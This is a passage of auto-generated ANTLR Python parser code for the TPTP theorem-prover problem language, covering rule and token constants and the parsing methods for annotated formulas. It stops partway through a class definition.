RULE_thf_formula_list = 46
RULE_tfx_formula = 47
RULE_tfx_logic_formula = 48
RULE_tff_formula = 49
RULE_tff_logic_formula = 50
RULE_tff_binary_formula = 51
RULE_tff_binary_nonassoc = 52
RULE_tff_binary_assoc = 53
RULE_tff_or_formula = 54
RULE_tff_and_formula = 55
RULE_tff_unitary_formula = 56
RULE_tff_quantified_formula = 57
RULE_tff_variable_list = 58
RULE_tff_variable = 59
RULE_tff_typed_variable = 60
RULE_tff_unary_formula = 61
RULE_tff_atomic_formula = 62
RULE_tff_conditional = 63
RULE_tff_let = 64
RULE_tff_let_term_defns = 65
RULE_tff_let_term_list = 66
RULE_tff_let_term_defn = 67
RULE_tff_let_term_binding = 68
RULE_tff_let_formula_defns = 69
RULE_tff_let_formula_list = 70
RULE_tff_let_formula_defn = 71
RULE_tff_let_formula_binding = 72
RULE_tff_sequent = 73
RULE_tff_formula_tuple = 74
RULE_tff_formula_tuple_list = 75
RULE_tff_typed_atom = 76
RULE_tff_subtype = 77
RULE_tff_top_level_type = 78
RULE_tf1_quantified_type = 79
RULE_tff_monotype = 80
RULE_tff_unitary_type = 81
RULE_tff_atomic_type = 82
RULE_tff_type_arguments = 83
RULE_tff_mapping_type = 84
RULE_tff_xprod_type = 85
RULE_tcf_formula = 86
RULE_tcf_logic_formula = 87
RULE_tcf_quantified_formula = 88
RULE_fof_formula = 89
RULE_fof_logic_formula = 90
RULE_fof_binary_formula = 91
RULE_fof_binary_nonassoc = 92
RULE_fof_binary_assoc = 93
RULE_fof_or_formula = 94
RULE_fof_and_formula = 95
RULE_fof_unitary_formula = 96
RULE_fof_quantified_formula = 97
RULE_fof_variable_list = 98
RULE_fof_unary_formula = 99
RULE_fof_infix_unary = 100
RULE_fof_atomic_formula = 101
RULE_fof_plain_atomic_formula = 102
RULE_fof_defined_atomic_formula = 103
RULE_fof_defined_plain_formula = 104
RULE_fof_defined_infix_formula = 105
RULE_fof_system_atomic_formula = 106
RULE_fof_plain_term = 107
RULE_fof_defined_term = 108
RULE_fof_defined_atomic_term = 109
RULE_fof_defined_plain_term = 110
RULE_fof_system_term = 111
RULE_fof_arguments = 112
RULE_fof_term = 113
RULE_fof_function_term = 114
RULE_tff_conditional_term = 115
RULE_tff_let_term = 116
RULE_tff_tuple_term = 117
RULE_fof_sequent = 118
RULE_fof_formula_tuple = 119
RULE_fof_formula_tuple_list = 120
RULE_cnf_formula = 121
RULE_cnf_disjunction = 122
RULE_cnf_literal = 123
RULE_thf_quantifier = 124
RULE_th0_quantifier = 125
RULE_th1_quantifier = 126
RULE_thf_pair_connective = 127
RULE_thf_unary_connective = 128
RULE_th1_unary_connective = 129
RULE_tff_pair_connective = 130
RULE_fof_quantifier = 131
RULE_binary_connective = 132
RULE_assoc_connective = 133
RULE_unary_connective = 134
RULE_type_constant = 135
RULE_type_functor = 136
RULE_defined_type = 137
RULE_system_type = 138
RULE_atom = 139
RULE_untyped_atom = 140
RULE_defined_proposition = 141
RULE_defined_predicate = 142
RULE_defined_infix_pred = 143
RULE_constant = 144
RULE_functor = 145
RULE_system_constant = 146
RULE_system_functor = 147
RULE_defined_constant = 148
RULE_defined_functor = 149
RULE_defined_term = 150
RULE_variable = 151
RULE_source = 152
RULE_sources = 153
RULE_dag_source = 154
RULE_inference_record = 155
RULE_inference_rule = 156
RULE_inference_parents = 157
RULE_parent_list = 158
RULE_parent_info = 159
RULE_parent_details = 160
RULE_internal_source = 161
RULE_intro_type = 162
RULE_external_source = 163
RULE_file_source = 164
RULE_file_info = 165
RULE_theory = 166
RULE_theory_name = 167
RULE_creator_source = 168
RULE_creator_name = 169
RULE_optional_info = 170
RULE_useful_info = 171
RULE_info_items = 172
RULE_info_item = 173
RULE_formula_item = 174
RULE_description_item = 175
RULE_iquote_item = 176
RULE_inference_item = 177
RULE_inference_status = 178
RULE_status_value = 179
RULE_inference_info = 180
RULE_assumptions_record = 181
RULE_refutation = 182
RULE_new_symbol_record = 183
RULE_new_symbol_list = 184
RULE_principal_symbol = 185
RULE_include = 186
RULE_formula_selection = 187
RULE_name_list = 188
RULE_general_term = 189
RULE_general_data = 190
RULE_general_function = 191
RULE_formula_data = 192
RULE_general_list = 193
RULE_general_terms = 194
RULE_name = 195
RULE_atomic_word = 196
RULE_atomic_defined_word = 197
RULE_atomic_system_word = 198
RULE_number = 199
RULE_file_name = 200
ruleNames = [ "tptp_file", "tptp_input", "annotated_formula", "tpi_annotated",
"tpi_formula", "thf_annotated", "tfx_annotated", "tff_annotated",
"tcf_annotated", "fof_annotated", "cnf_annotated", "annotations",
"formula_role", "thf_formula", "thf_logic_formula", "thf_binary_formula",
"thf_binary_pair", "thf_binary_tuple", "thf_or_formula",
"thf_and_formula", "thf_apply_formula", "thf_unitary_formula",
"thf_quantified_formula", "thf_quantification", "thf_variable_list",
"thf_variable", "thf_typed_variable", "thf_unary_formula",
"thf_atom", "thf_function", "thf_conn_term", "thf_conditional",
"thf_let", "thf_arguments", "thf_type_formula", "thf_typeable_formula",
"thf_subtype", "thf_top_level_type", "thf_unitary_type",
"thf_apply_type", "thf_binary_type", "thf_mapping_type",
"thf_xprod_type", "thf_union_type", "thf_sequent", "thf_tuple",
"thf_formula_list", "tfx_formula", "tfx_logic_formula",
"tff_formula", "tff_logic_formula", "tff_binary_formula",
"tff_binary_nonassoc", "tff_binary_assoc", "tff_or_formula",
"tff_and_formula", "tff_unitary_formula", "tff_quantified_formula",
"tff_variable_list", "tff_variable", "tff_typed_variable",
"tff_unary_formula", "tff_atomic_formula", "tff_conditional",
"tff_let", "tff_let_term_defns", "tff_let_term_list",
"tff_let_term_defn", "tff_let_term_binding", "tff_let_formula_defns",
"tff_let_formula_list", "tff_let_formula_defn", "tff_let_formula_binding",
"tff_sequent", "tff_formula_tuple", "tff_formula_tuple_list",
"tff_typed_atom", "tff_subtype", "tff_top_level_type",
"tf1_quantified_type", "tff_monotype", "tff_unitary_type",
"tff_atomic_type", "tff_type_arguments", "tff_mapping_type",
"tff_xprod_type", "tcf_formula", "tcf_logic_formula",
"tcf_quantified_formula", "fof_formula", "fof_logic_formula",
"fof_binary_formula", "fof_binary_nonassoc", "fof_binary_assoc",
"fof_or_formula", "fof_and_formula", "fof_unitary_formula",
"fof_quantified_formula", "fof_variable_list", "fof_unary_formula",
"fof_infix_unary", "fof_atomic_formula", "fof_plain_atomic_formula",
"fof_defined_atomic_formula", "fof_defined_plain_formula",
"fof_defined_infix_formula", "fof_system_atomic_formula",
"fof_plain_term", "fof_defined_term", "fof_defined_atomic_term",
"fof_defined_plain_term", "fof_system_term", "fof_arguments",
"fof_term", "fof_function_term", "tff_conditional_term",
"tff_let_term", "tff_tuple_term", "fof_sequent", "fof_formula_tuple",
"fof_formula_tuple_list", "cnf_formula", "cnf_disjunction",
"cnf_literal", "thf_quantifier", "th0_quantifier", "th1_quantifier",
"thf_pair_connective", "thf_unary_connective", "th1_unary_connective",
"tff_pair_connective", "fof_quantifier", "binary_connective",
"assoc_connective", "unary_connective", "type_constant",
"type_functor", "defined_type", "system_type", "atom",
"untyped_atom", "defined_proposition", "defined_predicate",
"defined_infix_pred", "constant", "functor", "system_constant",
"system_functor", "defined_constant", "defined_functor",
"defined_term", "variable", "source", "sources", "dag_source",
"inference_record", "inference_rule", "inference_parents",
"parent_list", "parent_info", "parent_details", "internal_source",
"intro_type", "external_source", "file_source", "file_info",
"theory", "theory_name", "creator_source", "creator_name",
"optional_info", "useful_info", "info_items", "info_item",
"formula_item", "description_item", "iquote_item", "inference_item",
"inference_status", "status_value", "inference_info",
"assumptions_record", "refutation", "new_symbol_record",
"new_symbol_list", "principal_symbol", "include", "formula_selection",
"name_list", "general_term", "general_data", "general_function",
"formula_data", "general_list", "general_terms", "name",
"atomic_word", "atomic_defined_word", "atomic_system_word",
"number", "file_name" ]
EOF = Token.EOF
T__0=1
T__1=2
T__2=3
T__3=4
T__4=5
T__5=6
T__6=7
T__7=8
T__8=9
T__9=10
T__10=11
T__11=12
T__12=13
T__13=14
T__14=15
T__15=16
T__16=17
T__17=18
T__18=19
T__19=20
T__20=21
T__21=22
T__22=23
T__23=24
T__24=25
T__25=26
T__26=27
T__27=28
T__28=29
T__29=30
T__30=31
T__31=32
T__32=33
T__33=34
T__34=35
T__35=36
T__36=37
T__37=38
T__38=39
T__39=40
T__40=41
T__41=42
T__42=43
Or=44
And=45
Iff=46
Impl=47
If=48
Niff=49
Nor=50
Nand=51
Not=52
ForallComb=53
TyForall=54
Infix_inequality=55
Infix_equality=56
Forall=57
ExistsComb=58
TyExists=59
Exists=60
Lambda=61
ChoiceComb=62
Choice=63
DescriptionComb=64
Description=65
EqComb=66
App=67
Assignment=68
Arrow=69
Star=70
Plus=71
Subtype_sign=72
Gentzen_arrow=73
Real=74
Signed_real=75
Unsigned_real=76
Rational=77
Signed_rational=78
Unsigned_rational=79
Integer=80
Signed_integer=81
Unsigned_integer=82
Decimal=83
Positive_decimal=84
Decimal_exponent=85
Decimal_fraction=86
Dot_decimal=87
Exp_integer=88
Signed_exp_integer=89
Unsigned_exp_integer=90
Dollar_word=91
Dollar_dollar_word=92
Upper_word=93
Lower_word=94
Single_quoted=95
Distinct_object=96
WS=97
Line_comment=98
Block_comment=99
def __init__(self, input:TokenStream, output:TextIO = sys.stdout):
super().__init__(input, output)
self.checkVersion("4.9")
self._interp = ParserATNSimulator(self, self.atn, self.decisionsToDFA, self.sharedContextCache)
self._predicates = None
class Tptp_fileContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def EOF(self):
return self.getToken(tptp_v7_0_0_0Parser.EOF, 0)
def tptp_input(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Tptp_inputContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tptp_inputContext,i)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tptp_file
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTptp_file" ):
listener.enterTptp_file(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTptp_file" ):
listener.exitTptp_file(self)
def tptp_file(self):
localctx = tptp_v7_0_0_0Parser.Tptp_fileContext(self, self._ctx, self.state)
self.enterRule(localctx, 0, self.RULE_tptp_file)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 405
self._errHandler.sync(self)
_la = self._input.LA(1)
while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << tptp_v7_0_0_0Parser.T__0) | (1 << tptp_v7_0_0_0Parser.T__3) | (1 << tptp_v7_0_0_0Parser.T__4) | (1 << tptp_v7_0_0_0Parser.T__5) | (1 << tptp_v7_0_0_0Parser.T__6) | (1 << tptp_v7_0_0_0Parser.T__7) | (1 << tptp_v7_0_0_0Parser.T__8) | (1 << tptp_v7_0_0_0Parser.T__37))) != 0):
self.state = 402
self.tptp_input()
self.state = 407
self._errHandler.sync(self)
_la = self._input.LA(1)
self.state = 408
self.match(tptp_v7_0_0_0Parser.EOF)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tptp_inputContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def annotated_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Annotated_formulaContext,0)
def include(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.IncludeContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tptp_input
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTptp_input" ):
listener.enterTptp_input(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTptp_input" ):
listener.exitTptp_input(self)
def tptp_input(self):
localctx = tptp_v7_0_0_0Parser.Tptp_inputContext(self, self._ctx, self.state)
self.enterRule(localctx, 2, self.RULE_tptp_input)
try:
self.state = 412
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.T__0, tptp_v7_0_0_0Parser.T__3, tptp_v7_0_0_0Parser.T__4, tptp_v7_0_0_0Parser.T__5, tptp_v7_0_0_0Parser.T__6, tptp_v7_0_0_0Parser.T__7, tptp_v7_0_0_0Parser.T__8]:
self.enterOuterAlt(localctx, 1)
self.state = 410
self.annotated_formula()
pass
elif token in [tptp_v7_0_0_0Parser.T__37]:
self.enterOuterAlt(localctx, 2)
self.state = 411
self.include()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Annotated_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_annotated(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_annotatedContext,0)
def tfx_annotated(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tfx_annotatedContext,0)
def tff_annotated(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_annotatedContext,0)
def tcf_annotated(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tcf_annotatedContext,0)
def fof_annotated(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_annotatedContext,0)
def cnf_annotated(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Cnf_annotatedContext,0)
def tpi_annotated(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tpi_annotatedContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_annotated_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterAnnotated_formula" ):
listener.enterAnnotated_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitAnnotated_formula" ):
listener.exitAnnotated_formula(self)
def annotated_formula(self):
localctx = tptp_v7_0_0_0Parser.Annotated_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 4, self.RULE_annotated_formula)
try:
self.state = 421
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.T__3]:
self.enterOuterAlt(localctx, 1)
self.state = 414
self.thf_annotated()
pass
elif token in [tptp_v7_0_0_0Parser.T__4]:
self.enterOuterAlt(localctx, 2)
self.state = 415
self.tfx_annotated()
pass
elif token in [tptp_v7_0_0_0Parser.T__5]:
self.enterOuterAlt(localctx, 3)
self.state = 416
self.tff_annotated()
pass
elif token in [tptp_v7_0_0_0Parser.T__6]:
self.enterOuterAlt(localctx, 4)
self.state = 417
self.tcf_annotated()
pass
elif token in [tptp_v7_0_0_0Parser.T__7]:
self.enterOuterAlt(localctx, 5)
self.state = 418
self.fof_annotated()
pass
elif token in [tptp_v7_0_0_0Parser.T__8]:
self.enterOuterAlt(localctx, 6)
self.state = 419
self.cnf_annotated()
pass
elif token in [tptp_v7_0_0_0Parser.T__0]:
self.enterOuterAlt(localctx, 7)
self.state = 420
self.tpi_annotated()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tpi_annotatedContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def name(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.NameContext,0)
def formula_role(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Formula_roleContext,0)
def tpi_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tpi_formulaContext,0)
def annotations(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.AnnotationsContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tpi_annotated
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTpi_annotated" ):
listener.enterTpi_annotated(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTpi_annotated" ):
listener.exitTpi_annotated(self)
def tpi_annotated(self):
localctx = tptp_v7_0_0_0Parser.Tpi_annotatedContext(self, self._ctx, self.state)
self.enterRule(localctx, 6, self.RULE_tpi_annotated)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 423
self.match(tptp_v7_0_0_0Parser.T__0)
self.state = 424
self.name()
self.state = 425
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 426
self.formula_role()
self.state = 427
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 428
self.tpi_formula()
self.state = 430
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==tptp_v7_0_0_0Parser.T__1:
self.state = 429
self.annotations()
self.state = 432
self.match(tptp_v7_0_0_0Parser.T__2)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tpi_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tpi_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTpi_formula" ):
listener.enterTpi_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTpi_formula" ):
listener.exitTpi_formula(self)
def tpi_formula(self):
localctx = tptp_v7_0_0_0Parser.Tpi_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 8, self.RULE_tpi_formula)
try:
self.enterOuterAlt(localctx, 1)
self.state = 434
self.fof_formula()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_annotatedContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def name(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.NameContext,0)
def formula_role(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Formula_roleContext,0)
def thf_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_formulaContext,0)
def annotations(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.AnnotationsContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_annotated
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_annotated" ):
listener.enterThf_annotated(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_annotated" ):
listener.exitThf_annotated(self)
def thf_annotated(self):
localctx = tptp_v7_0_0_0Parser.Thf_annotatedContext(self, self._ctx, self.state)
self.enterRule(localctx, 10, self.RULE_thf_annotated)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 436
self.match(tptp_v7_0_0_0Parser.T__3)
self.state = 437
self.name()
self.state = 438
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 439
self.formula_role()
self.state = 440
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 441
self.thf_formula()
self.state = 443
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==tptp_v7_0_0_0Parser.T__1:
self.state = 442
self.annotations()
self.state = 445
self.match(tptp_v7_0_0_0Parser.T__2)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tfx_annotatedContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def name(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.NameContext,0)
def formula_role(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Formula_roleContext,0)
def tfx_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tfx_formulaContext,0)
def annotations(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.AnnotationsContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tfx_annotated
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTfx_annotated" ):
listener.enterTfx_annotated(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTfx_annotated" ):
listener.exitTfx_annotated(self)
def tfx_annotated(self):
localctx = tptp_v7_0_0_0Parser.Tfx_annotatedContext(self, self._ctx, self.state)
self.enterRule(localctx, 12, self.RULE_tfx_annotated)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 447
self.match(tptp_v7_0_0_0Parser.T__4)
self.state = 448
self.name()
self.state = 449
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 450
self.formula_role()
self.state = 451
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 452
self.tfx_formula()
self.state = 454
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==tptp_v7_0_0_0Parser.T__1:
self.state = 453
self.annotations()
self.state = 456
self.match(tptp_v7_0_0_0Parser.T__2)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_annotatedContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def name(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.NameContext,0)
def formula_role(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Formula_roleContext,0)
def tff_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_formulaContext,0)
def annotations(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.AnnotationsContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_annotated
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_annotated" ):
listener.enterTff_annotated(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_annotated" ):
listener.exitTff_annotated(self)
def tff_annotated(self):
localctx = tptp_v7_0_0_0Parser.Tff_annotatedContext(self, self._ctx, self.state)
self.enterRule(localctx, 14, self.RULE_tff_annotated)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 458
self.match(tptp_v7_0_0_0Parser.T__5)
self.state = 459
self.name()
self.state = 460
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 461
self.formula_role()
self.state = 462
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 463
self.tff_formula()
self.state = 465
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==tptp_v7_0_0_0Parser.T__1:
self.state = 464
self.annotations()
self.state = 467
self.match(tptp_v7_0_0_0Parser.T__2)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tcf_annotatedContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def name(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.NameContext,0)
def formula_role(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Formula_roleContext,0)
def tcf_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tcf_formulaContext,0)
def annotations(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.AnnotationsContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tcf_annotated
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTcf_annotated" ):
listener.enterTcf_annotated(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTcf_annotated" ):
listener.exitTcf_annotated(self)
def tcf_annotated(self):
localctx = tptp_v7_0_0_0Parser.Tcf_annotatedContext(self, self._ctx, self.state)
self.enterRule(localctx, 16, self.RULE_tcf_annotated)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 469
self.match(tptp_v7_0_0_0Parser.T__6)
self.state = 470
self.name()
self.state = 471
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 472
self.formula_role()
self.state = 473
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 474
self.tcf_formula()
self.state = 476
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==tptp_v7_0_0_0Parser.T__1:
self.state = 475
self.annotations()
self.state = 478
self.match(tptp_v7_0_0_0Parser.T__2)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_annotatedContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def name(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.NameContext,0)
def formula_role(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Formula_roleContext,0)
def fof_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_formulaContext,0)
def annotations(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.AnnotationsContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_annotated
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_annotated" ):
listener.enterFof_annotated(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_annotated" ):
listener.exitFof_annotated(self)
def fof_annotated(self):
localctx = tptp_v7_0_0_0Parser.Fof_annotatedContext(self, self._ctx, self.state)
self.enterRule(localctx, 18, self.RULE_fof_annotated)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 480
self.match(tptp_v7_0_0_0Parser.T__7)
self.state = 481
self.name()
self.state = 482
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 483
self.formula_role()
self.state = 484
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 485
self.fof_formula()
self.state = 487
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==tptp_v7_0_0_0Parser.T__1:
self.state = 486
self.annotations()
self.state = 489
self.match(tptp_v7_0_0_0Parser.T__2)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Cnf_annotatedContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def name(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.NameContext,0)
def formula_role(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Formula_roleContext,0)
def cnf_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Cnf_formulaContext,0)
def annotations(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.AnnotationsContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_cnf_annotated
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterCnf_annotated" ):
listener.enterCnf_annotated(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitCnf_annotated" ):
listener.exitCnf_annotated(self)
def cnf_annotated(self):
localctx = tptp_v7_0_0_0Parser.Cnf_annotatedContext(self, self._ctx, self.state)
self.enterRule(localctx, 20, self.RULE_cnf_annotated)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 491
self.match(tptp_v7_0_0_0Parser.T__8)
self.state = 492
self.name()
self.state = 493
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 494
self.formula_role()
self.state = 495
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 496
self.cnf_formula()
self.state = 498
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==tptp_v7_0_0_0Parser.T__1:
self.state = 497
self.annotations()
self.state = 500
self.match(tptp_v7_0_0_0Parser.T__2)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class AnnotationsContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def source(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.SourceContext,0)
def optional_info(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Optional_infoContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_annotations
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterAnnotations" ):
listener.enterAnnotations(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitAnnotations" ):
listener.exitAnnotations(self)
def annotations(self):
localctx = tptp_v7_0_0_0Parser.AnnotationsContext(self, self._ctx, self.state)
self.enterRule(localctx, 22, self.RULE_annotations)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 502
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 503
self.source()
self.state = 505
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==tptp_v7_0_0_0Parser.T__1:
self.state = 504
self.optional_info()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Formula_roleContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def Lower_word(self):
